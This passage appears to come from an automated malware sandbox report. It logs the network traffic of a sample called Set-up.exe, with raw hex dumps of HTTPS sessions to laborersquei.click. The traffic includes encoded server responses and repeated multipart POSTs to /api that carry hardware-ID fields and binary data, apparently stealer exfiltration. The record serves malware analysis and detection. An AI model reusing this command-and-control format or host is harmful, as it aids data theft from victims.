                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zp9FC4RjImgUy22H6RGmhtbVMP5WMUH%2FjGoyIKwDjuhPZOO9L1Pj3aR7k3Y33b8DgINHtDX2Jpj%2FEHWF6RugbVEfndx3VmcrSHrhMw5jh4FqknA3bfPPKb4ocEb4aPlA7pH%2FMaA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8fa3a8b3fe3f4386-EWR
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1616&min_rtt=1615&rtt_var=608&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2845&recv_bytes=979&delivery_rate=1794714&cwnd=246&unsent_bytes=0&cid=3310ebf7d42c56ac&ts=483&x=0"
                                                                                                                                                2024-12-30 17:13:11 UTC242INData Raw: 34 36 65 0d 0a 55 48 52 2b 54 31 77 4a 78 43 4d 7a 76 5a 51 72 4a 47 49 4b 6a 59 68 65 78 6c 71 38 4c 31 44 74 5a 62 34 2b 4d 49 73 36 56 33 49 72 56 67 68 74 5a 6a 33 6f 41 55 44 59 74 68 46 43 41 32 62 2b 37 58 4c 6b 4f 39 67 4e 61 6f 73 45 30 6b 31 56 70 78 67 68 48 33 4a 4f 47 43 34 77 65 71 45 50 45 64 6a 73 43 52 34 35 63 61 2f 74 4d 4f 52 67 6e 6b 6f 36 6a 77 54 53 58 46 48 67 56 53 63 65 4d 78 77 53 4b 44 52 73 70 30 64 53 30 66 6c 4f 51 51 64 72 35 2b 59 33 71 7a 4c 52 44 58 7a 50 41 4d 51 63 43 71 6c 33 4d 67 59 78 4f 52 38 38 4e 79 75 35 44 30 69 66 38 55 55 47 57 43 6a 73 37 54 79 71 50 4e 68 45 4f 49 55 4e 32 6c 31 55 34 55 6f 2b 46 44 67 63 48 43 73 31 5a 71 35 54 58 39 76 2b 52 55 63 4e 61 36 2b 6b 66
                                                                                                                                                Data Ascii: 46eUHR+T1wJxCMzvZQrJGIKjYhexlq8L1DtZb4+MIs6V3IrVghtZj3oAUDYthFCA2b+7XLkO9gNaosE0k1VpxghH3JOGC4weqEPEdjsCR45ca/tMORgnko6jwTSXFHgVSceMxwSKDRsp0dS0flOQQdr5+Y3qzLRDXzPAMQcCql3MgYxOR88Nyu5D0if8UUGWCjs7TyqPNhEOIUN2l1U4Uo+FDgcHCs1Zq5TX9v+RUcNa6+kf
                                                                                                                                                2024-12-30 17:13:11 UTC899INData Raw: 4b 4d 67 6e 68 56 79 33 44 58 66 54 55 50 38 56 53 55 57 63 67 6c 53 4e 48 35 73 71 67 45 4a 6e 2f 35 46 53 41 56 72 34 4f 30 39 70 43 72 52 54 54 47 48 44 39 68 57 58 65 5a 58 4f 78 6f 31 48 68 55 71 4d 57 79 75 52 31 37 63 74 67 63 47 42 33 43 76 73 6e 79 45 4b 4e 31 4f 4a 6f 49 57 6e 45 4d 63 38 42 67 79 48 48 4a 4f 58 43 73 77 61 71 74 42 51 39 66 39 51 6b 4d 53 59 2b 62 6e 4d 61 51 31 31 45 49 78 6a 77 44 57 56 6c 33 6a 58 44 67 64 4e 42 59 63 62 58 41 72 6f 56 6b 52 68 37 5a 71 51 78 42 76 34 2f 78 2b 6e 6e 6a 42 41 79 76 50 41 4e 41 63 43 71 6c 51 4d 42 4d 78 48 52 4d 75 4e 6d 43 30 51 55 50 5a 2b 30 78 55 42 6d 33 68 34 44 2b 32 4d 74 42 4c 4d 59 59 4d 31 56 6c 56 37 52 68 37 55 44 55 4f 58 48 56 2b 53 71 74 4b 58 64 58 68 53 51 59 66 4a 76 61 71
                                                                                                                                                Data Ascii: KMgnhVy3DXfTUP8VSUWcglSNH5sqgEJn/5FSAVr4O09pCrRTTGHD9hWXeZXOxo1HhUqMWyuR17ctgcGB3CvsnyEKN1OJoIWnEMc8BgyHHJOXCswaqtBQ9f9QkMSY+bnMaQ11EIxjwDWVl3jXDgdNBYcbXAroVkRh7ZqQxBv4/x+nnjBAyvPANAcCqlQMBMxHRMuNmC0QUPZ+0xUBm3h4D+2MtBLMYYM1VlV7Rh7UDUOXHV+SqtKXdXhSQYfJvaq
                                                                                                                                                2024-12-30 17:13:11 UTC1369INData Raw: 33 36 31 61 0d 0a 6f 2f 79 41 30 74 77 52 36 63 57 31 36 70 41 48 55 66 50 52 6b 55 4c 54 39 76 71 30 56 51 30 76 70 41 52 51 78 6b 35 2b 63 77 6f 44 66 57 52 54 47 48 46 64 4a 53 56 4f 39 59 4d 46 42 38 56 68 73 31 66 6a 50 6d 5a 56 2f 49 34 6b 49 45 4e 57 76 68 35 44 75 79 65 4d 45 44 4b 38 38 41 30 42 77 4b 71 56 59 34 47 7a 34 52 46 53 77 39 61 36 78 50 58 74 58 2b 51 55 59 4e 61 65 54 69 4f 71 6b 7a 30 55 49 31 68 77 54 51 57 56 2f 71 47 48 74 51 4e 51 35 63 64 58 35 4f 71 45 4a 41 7a 72 52 38 52 51 35 6d 36 50 78 38 75 33 62 48 44 54 57 44 52 34 51 63 57 4f 35 66 4d 52 30 34 46 52 67 70 4d 32 53 76 53 46 6a 4e 2f 45 56 49 45 6d 58 6c 37 7a 4b 6f 50 64 46 4e 4d 34 34 4a 31 6c 63 53 70 78 67 79 43 48 4a 4f 58 41 49 7a 65 37 52 4c 57 73 36 30 66 45 55
                                                                                                                                                Data Ascii: 361ao/yA0twR6cW16pAHUfPRkULT9vq0VQ0vpARQxk5+cwoDfWRTGHFdJSVO9YMFB8Vhs1fjPmZV/I4kIENWvh5DuyeMEDK88A0BwKqVY4Gz4RFSw9a6xPXtX+QUYNaeTiOqkz0UI1hwTQWV/qGHtQNQ5cdX5OqEJAzrR8RQ5m6Px8u3bHDTWDR4QcWO5fMR04FRgpM2SvSFjN/EVIEmXl7zKoPdFNM44J1lcSpxgyCHJOXAIze7RLWs60fEU
                                                                                                                                                2024-12-30 17:13:11 UTC1369INData Raw: 6e 79 4c 4f 38 68 48 63 70 42 4a 78 52 78 56 35 52 68 74 55 44 67 61 47 43 34 79 59 71 70 4d 55 4e 76 78 52 45 49 41 62 75 6e 76 50 61 38 77 30 6b 49 34 67 77 50 51 56 56 54 6c 57 7a 59 57 63 6c 68 63 4b 69 59 72 2f 67 46 77 30 76 31 46 52 67 4e 35 36 4b 70 79 35 44 62 59 54 58 4c 58 45 63 78 4c 56 66 59 57 4c 46 41 31 47 6c 78 31 66 6d 47 30 52 46 2f 62 2f 45 78 43 44 47 4c 76 37 79 36 73 50 74 6c 42 4f 6f 6f 49 32 6c 6c 66 37 6c 4d 32 41 69 41 56 47 43 4d 79 4b 2b 67 42 56 73 65 32 45 51 59 6c 66 2b 7a 36 4f 71 64 34 77 51 4d 72 7a 77 44 51 48 41 71 70 57 44 73 63 4f 52 45 58 4a 6a 70 76 70 6b 78 61 30 66 68 41 53 67 68 6b 36 50 67 78 6f 54 44 55 52 44 65 44 43 74 39 4f 55 65 67 59 65 31 41 31 44 6c 78 31 66 6b 79 56 64 6e 4b 66 36 51 64 66 51 47 2f 6a
                                                                                                                                                Data Ascii: nyLO8hHcpBJxRxV5RhtUDgaGC4yYqpMUNvxREIAbunvPa8w0kI4gwPQVVTlWzYWclhcKiYr/gFw0v1FRgN56Kpy5DbYTXLXEcxLVfYWLFA1Glx1fmG0RF/b/ExCDGLv7y6sPtlBOooI2llf7lM2AiAVGCMyK+gBVse2EQYlf+z6Oqd4wQMrzwDQHAqpWDscOREXJjpvpkxa0fhASghk6PgxoTDURDeDCt9OUegYe1A1Dlx1fkyVdnKf6QdfQG/j
                                                                                                                                                2024-12-30 17:13:11 UTC1369INData Raw: 54 64 51 6a 6e 50 47 4a 4a 46 45 75 35 55 64 55 68 79 45 52 51 6c 4d 47 69 67 53 6c 33 54 39 30 42 41 42 57 44 6f 35 54 75 74 50 39 35 4c 49 49 67 4b 31 56 78 5a 34 46 49 78 45 54 6c 57 55 6d 30 35 63 2b 59 5a 45 65 33 78 58 31 59 44 4b 50 43 6b 4a 65 51 2f 30 67 31 71 7a 77 72 4f 58 56 66 37 58 44 6f 62 49 42 30 61 4c 54 74 35 6f 55 31 62 30 50 56 42 53 77 4e 67 2f 65 6f 78 70 43 72 4d 53 7a 6d 42 52 35 49 63 56 66 45 59 62 56 41 44 41 52 64 74 49 53 57 2f 41 56 62 54 74 68 45 47 41 32 4c 69 35 43 36 67 50 74 56 4f 50 49 63 43 31 46 68 59 35 46 63 2b 47 6a 73 65 48 43 49 37 59 36 31 48 58 39 37 77 52 55 74 41 4a 71 2f 74 4a 4f 52 67 6e 6d 6f 6f 67 67 48 4c 54 57 66 75 57 47 52 51 4c 56 67 46 62 54 6c 6e 35 68 6b 52 30 76 70 44 53 77 56 73 35 2b 30 2f 70
                                                                                                                                                Data Ascii: TdQjnPGJJFEu5UdUhyERQlMGigSl3T90BABWDo5TutP95LIIgK1VxZ4FIxETlWUm05c+YZEe3xX1YDKPCkJeQ/0g1qzwrOXVf7XDobIB0aLTt5oU1b0PVBSwNg/eoxpCrMSzmBR5IcVfEYbVADARdtISW/AVbTthEGA2Li5C6gPtVOPIcC1FhY5Fc+GjseHCI7Y61HX97wRUtAJq/tJORgnmooggHLTWfuWGRQLVgFbTln5hkR0vpDSwVs5+0/p
                                                                                                                                                2024-12-30 17:13:11 UTC1369INData Raw: 31 67 30 65 45 48 46 7a 6b 58 6a 51 52 4f 68 34 63 4b 7a 52 76 70 55 68 53 32 50 39 50 54 51 4e 69 34 4f 30 36 6f 44 6a 56 53 6a 79 4a 41 74 64 56 45 71 63 59 4d 67 68 79 54 6c 77 4c 48 58 6d 30 63 31 2f 63 37 51 6c 5a 54 6e 47 76 37 54 44 6b 59 4a 35 47 4f 6f 41 56 32 56 56 61 37 56 45 31 46 44 67 62 47 79 30 37 5a 71 4e 46 58 39 76 78 53 55 6f 50 62 2b 66 6c 4f 4b 51 33 6e 67 4e 79 69 42 2b 63 42 42 4c 4a 55 79 4d 78 50 42 30 4f 62 53 45 6c 76 77 46 57 30 37 59 52 42 67 35 68 37 75 49 79 71 44 44 61 58 7a 4b 45 44 74 4e 64 58 65 6c 62 4e 42 6f 36 42 42 6f 74 4e 57 4f 68 53 56 58 52 35 45 68 4a 51 43 61 76 37 53 54 6b 59 4a 35 38 4a 49 67 41 30 78 35 37 37 6b 4d 30 47 6a 45 64 45 47 30 68 4a 62 38 42 56 74 4f 32 45 51 59 4e 5a 4f 4c 75 4c 71 67 34 33 6b
                                                                                                                                                Data Ascii: 1g0eEHFzkXjQROh4cKzRvpUhS2P9PTQNi4O06oDjVSjyJAtdVEqcYMghyTlwLHXm0c1/c7QlZTnGv7TDkYJ5GOoAV2VVa7VE1FDgbGy07ZqNFX9vxSUoPb+flOKQ3ngNyiB+cBBLJUyMxPB0ObSElvwFW07YRBg5h7uIyqDDaXzKEDtNdXelbNBo6BBotNWOhSVXR5EhJQCav7STkYJ58JIgA0x577kM0GjEdEG0hJb8BVtO2EQYNZOLuLqg43k
                                                                                                                                                2024-12-30 17:13:11 UTC1369INData Raw: 31 31 4a 58 36 46 51 2f 46 7a 77 45 48 53 63 79 61 71 46 47 57 73 33 39 57 30 30 49 61 2b 48 69 4e 61 51 32 33 6b 77 2f 6a 30 65 53 48 46 58 78 47 47 31 51 46 7a 55 4c 4f 7a 51 70 68 56 5a 48 31 66 46 46 55 41 74 70 37 50 77 78 74 48 69 51 44 53 4f 49 46 70 77 45 52 50 6c 50 4d 67 39 38 44 31 77 71 4d 69 76 2b 41 56 72 51 2b 45 52 4e 42 47 48 71 34 6a 2b 68 50 64 52 42 50 6f 34 50 31 56 5a 58 37 46 34 2f 45 7a 77 5a 48 53 45 36 59 71 68 49 45 5a 47 32 54 6c 35 41 4d 4b 2f 63 4c 4b 4d 67 30 31 31 77 76 51 54 4e 54 55 66 6b 53 44 4e 53 48 52 55 51 4c 6a 74 73 74 67 46 4f 6b 65 38 4a 51 51 77 6f 74 36 6f 38 6f 44 54 64 53 6a 79 41 43 74 4e 62 57 65 5a 53 4f 77 49 39 45 78 51 68 4e 6d 61 30 53 31 76 4e 2f 30 42 4c 44 6d 44 39 36 58 7a 71 65 4e 6c 56 63 74 64
                                                                                                                                                Data Ascii: 11JX6FQ/FzwEHScyaqFGWs39W00Ia+HiNaQ23kw/j0eSHFXxGG1QFzULOzQphVZH1fFFUAtp7PwxtHiQDSOIFpwERPlPMg98D1wqMiv+AVrQ+ERNBGHq4j+hPdRBPo4P1VZX7F4/EzwZHSE6YqhIEZG2Tl5AMK/cLKMg011wvQTNTUfkSDNSHRUQLjtstgFOke8JQQwot6o8oDTdSjyACtNbWeZSOwI9ExQhNma0S1vN/0BLDmD96XzqeNlVctd
                                                                                                                                                2024-12-30 17:13:11 UTC1369INData Raw: 4e 64 34 50 67 59 7a 47 78 63 68 41 46 57 7a 51 6c 2f 52 38 56 39 58 51 43 61 76 35 58 7a 38 41 5a 34 46 63 72 42 4a 6e 45 51 53 73 52 67 41 45 7a 77 59 47 7a 73 76 4a 6f 5a 4b 52 39 37 37 51 6b 70 43 61 65 4c 36 4f 2b 52 32 6e 6b 74 79 31 31 65 53 48 46 62 34 47 47 31 41 59 45 31 4a 66 6d 6b 37 39 46 34 66 78 72 5a 66 42 6c 67 36 6f 61 6f 75 35 47 43 65 43 6a 47 64 46 64 70 66 52 4f 6f 66 43 79 34 53 48 52 41 75 4d 6d 71 68 41 52 2b 66 2b 51 6b 65 4f 53 6a 73 2b 43 37 72 4b 63 68 41 49 6f 68 4c 31 45 31 66 35 52 68 37 55 48 34 53 46 79 45 37 62 4c 59 4f 51 38 2f 39 52 56 42 4d 62 50 32 71 63 75 51 70 31 55 49 67 67 51 43 54 54 55 54 6b 53 44 59 56 4e 56 6f 55 50 44 4e 6e 35 67 38 52 79 76 31 46 51 41 31 39 6f 50 73 71 70 79 37 5a 41 54 71 65 43 74 41 63
                                                                                                                                                Data Ascii: Nd4PgYzGxchAFWzQl/R8V9XQCav5Xz8AZ4FcrBJnEQSsRgAEzwYGzsvJoZKR977QkpCaeL6O+R2nkty11eSHFb4GG1AYE1Jfmk79F4fxrZfBlg6oaou5GCeCjGdFdpfROofCy4SHRAuMmqhAR+f+QkeOSjs+C7rKchAIohL1E1f5Rh7UH4SFyE7bLYOQ8/9RVBMbP2qcuQp1UIggQCTTUTkSDYVNVoUPDNn5g8Ryv1FQA19oPsqpy7ZATqeCtAc
                                                                                                                                                2024-12-30 17:13:11 UTC1369INData Raw: 31 51 61 6c 59 70 4c 6a 42 6c 6f 56 64 41 6b 74 42 4b 51 51 5a 72 34 66 30 74 35 48 61 65 53 33 4c 58 56 5a 49 63 56 76 67 59 62 55 42 67 54 55 6c 2b 61 54 76 30 58 68 2f 47 74 6c 38 47 57 44 75 68 71 69 37 6b 59 4a 34 4b 50 49 49 47 33 31 4a 52 2b 30 6f 7a 45 79 51 56 57 78 4d 41 54 71 74 4d 56 4e 48 78 64 33 67 68 59 76 2f 6e 4d 36 4d 47 34 48 6f 6a 69 42 65 65 65 6c 48 2f 57 33 56 65 63 67 35 63 64 58 35 4b 72 46 46 63 30 50 45 4a 43 45 42 73 72 37 4a 38 67 54 58 54 53 44 79 49 52 66 31 57 51 75 52 58 4d 6c 42 38 56 68 42 74 5a 69 75 6e 53 30 48 53 2b 55 34 4b 42 33 4c 6f 71 6e 4c 6b 4e 70 34 56 63 6f 34 4e 7a 46 46 64 37 68 51 7a 48 6a 78 57 41 32 4d 6e 4b 37 41 42 43 59 79 34 43 56 52 41 4d 4b 2b 74 4d 71 6b 35 33 55 4d 78 6e 52 58 61 58 30 54 71 48
                                                                                                                                                Data Ascii: 1QalYpLjBloVdAktBKQQZr4f0t5HaeS3LXVZIcVvgYbUBgTUl+aTv0Xh/Gtl8GWDuhqi7kYJ4KPIIG31JR+0ozEyQVWxMATqtMVNHxd3ghYv/nM6MG4HojiBeeelH/W3Vecg5cdX5KrFFc0PEJCEBsr7J8gTXTSDyIRf1WQuRXMlB8VhBtZiunS0HS+U4KB3LoqnLkNp4Vco4NzFFd7hQzHjxWA2MnK7ABCYy4CVRAMK+tMqk53UMxnRXaX0TqH


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                2192.168.2.549706188.114.96.34432164C:\Users\user\Desktop\Set-up.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-12-30 17:13:12 UTC274OUTPOST /api HTTP/1.1
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Content-Type: multipart/form-data; boundary=35EJJUQY
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                Content-Length: 12773
                                                                                                                                                Host: laborersquei.click
                                                                                                                                                2024-12-30 17:13:12 UTC12773OUTData Raw: 2d 2d 33 35 45 4a 4a 55 51 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 37 42 34 41 46 46 39 33 46 43 44 34 30 43 42 36 33 44 31 34 39 41 31 30 42 34 46 35 30 30 33 0d 0a 2d 2d 33 35 45 4a 4a 55 51 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 33 35 45 4a 4a 55 51 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 44 4e 4f 0d 0a 2d 2d 33 35 45 4a 4a 55 51 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f
                                                                                                                                                Data Ascii: --35EJJUQYContent-Disposition: form-data; name="hwid"77B4AFF93FCD40CB63D149A10B4F5003--35EJJUQYContent-Disposition: form-data; name="pid"2--35EJJUQYContent-Disposition: form-data; name="lid"hRjzG3--DNO--35EJJUQYContent-Dispositio
                                                                                                                                                2024-12-30 17:13:12 UTC1136INHTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 30 Dec 2024 17:13:12 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: close
                                                                                                                                                Set-Cookie: PHPSESSID=e1pehgsceutklied4amf1rqbv1; expires=Fri, 25 Apr 2025 10:59:51 GMT; Max-Age=9999999; path=/
                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                Pragma: no-cache
                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                vary: accept-encoding
                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=chk7k4onUqvj7vkAeurK%2B8pVeNTNHhb8Q1tttU7MdymVVnGu29T9kLwt1bNb%2FW340jMOqoImpVYAjFMORq7cj8eo%2FbToNm%2Bjif65I4%2FnShCxGhnRj%2BuKH3TkJbexpXRoJ2iOQxg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8fa3a8baec900f4f-EWR
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1535&min_rtt=1528&rtt_var=587&sent=8&recv=18&lost=0&retrans=0&sent_bytes=2846&recv_bytes=13705&delivery_rate=1843434&cwnd=239&unsent_bytes=0&cid=9ce9e61eb561aee9&ts=536&x=0"
                                                                                                                                                2024-12-30 17:13:12 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                Data Ascii: fok 8.46.123.189
                                                                                                                                                2024-12-30 17:13:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                Data Ascii: 0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                3192.168.2.549707188.114.96.34432164C:\Users\user\Desktop\Set-up.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-12-30 17:13:13 UTC285OUTPOST /api HTTP/1.1
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Content-Type: multipart/form-data; boundary=LZ75PTAWC83KN3CTYS5
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                Content-Length: 15081
                                                                                                                                                Host: laborersquei.click
                                                                                                                                                2024-12-30 17:13:13 UTC15081OUTData Raw: 2d 2d 4c 5a 37 35 50 54 41 57 43 38 33 4b 4e 33 43 54 59 53 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 37 42 34 41 46 46 39 33 46 43 44 34 30 43 42 36 33 44 31 34 39 41 31 30 42 34 46 35 30 30 33 0d 0a 2d 2d 4c 5a 37 35 50 54 41 57 43 38 33 4b 4e 33 43 54 59 53 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4c 5a 37 35 50 54 41 57 43 38 33 4b 4e 33 43 54 59 53 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 44 4e
                                                                                                                                                Data Ascii: --LZ75PTAWC83KN3CTYS5Content-Disposition: form-data; name="hwid"77B4AFF93FCD40CB63D149A10B4F5003--LZ75PTAWC83KN3CTYS5Content-Disposition: form-data; name="pid"2--LZ75PTAWC83KN3CTYS5Content-Disposition: form-data; name="lid"hRjzG3--DN
                                                                                                                                                2024-12-30 17:13:13 UTC1131INHTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 30 Dec 2024 17:13:13 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: close
                                                                                                                                                Set-Cookie: PHPSESSID=p3ivq7um2t4q4o2crenie5s94v; expires=Fri, 25 Apr 2025 10:59:52 GMT; Max-Age=9999999; path=/
                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                Pragma: no-cache
                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                vary: accept-encoding
                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JYp6btusSaRm%2BHVqFQ9hrmkWHV4XLEe5C8s6UXzWd2bK5iYu268psxMRqtN1COdjqbHre5S562iHNvBJ%2BDCTqeB2LBLX0mFzYt5DcEgM5XH8RWTn7a5XH4h%2B87waX7aCevrdBb8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8fa3a8c1ecbef793-EWR
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1958&min_rtt=1590&rtt_var=1333&sent=10&recv=19&lost=0&retrans=0&sent_bytes=2845&recv_bytes=16024&delivery_rate=643313&cwnd=152&unsent_bytes=0&cid=bdc2f6b2f7da77cb&ts=545&x=0"
                                                                                                                                                2024-12-30 17:13:13 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                Data Ascii: fok 8.46.123.189
                                                                                                                                                2024-12-30 17:13:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                Data Ascii: 0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                4192.168.2.549708188.114.96.34432164C:\Users\user\Desktop\Set-up.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-12-30 17:13:14 UTC285OUTPOST /api HTTP/1.1
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Content-Type: multipart/form-data; boundary=WP6GKXANLN3P9BWPPON
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                Content-Length: 20571
                                                                                                                                                Host: laborersquei.click
                                                                                                                                                2024-12-30 17:13:14 UTC15331OUTData Raw: 2d 2d 57 50 36 47 4b 58 41 4e 4c 4e 33 50 39 42 57 50 50 4f 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 37 42 34 41 46 46 39 33 46 43 44 34 30 43 42 36 33 44 31 34 39 41 31 30 42 34 46 35 30 30 33 0d 0a 2d 2d 57 50 36 47 4b 58 41 4e 4c 4e 33 50 39 42 57 50 50 4f 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 57 50 36 47 4b 58 41 4e 4c 4e 33 50 39 42 57 50 50 4f 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 44 4e
                                                                                                                                                Data Ascii: --WP6GKXANLN3P9BWPPONContent-Disposition: form-data; name="hwid"77B4AFF93FCD40CB63D149A10B4F5003--WP6GKXANLN3P9BWPPONContent-Disposition: form-data; name="pid"3--WP6GKXANLN3P9BWPPONContent-Disposition: form-data; name="lid"hRjzG3--DN
                                                                                                                                                2024-12-30 17:13:14 UTC5240OUTData Raw: 93 af 35 13 92 cd 36 8a 95 d9 76 89 c4 4d c9 4d d9 5a b5 da 68 27 0c 46 c7 33 b7 ee 57 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                Data Ascii: 56vMMZh'F3Wun 4F([:7s~X`nO
                                                                                                                                                2024-12-30 17:13:15 UTC1139INHTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 30 Dec 2024 17:13:15 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: close
                                                                                                                                                Set-Cookie: PHPSESSID=c4jb5dq7u0dsko1ekcqs0k31t2; expires=Fri, 25 Apr 2025 10:59:54 GMT; Max-Age=9999999; path=/
                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                Pragma: no-cache
                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                vary: accept-encoding
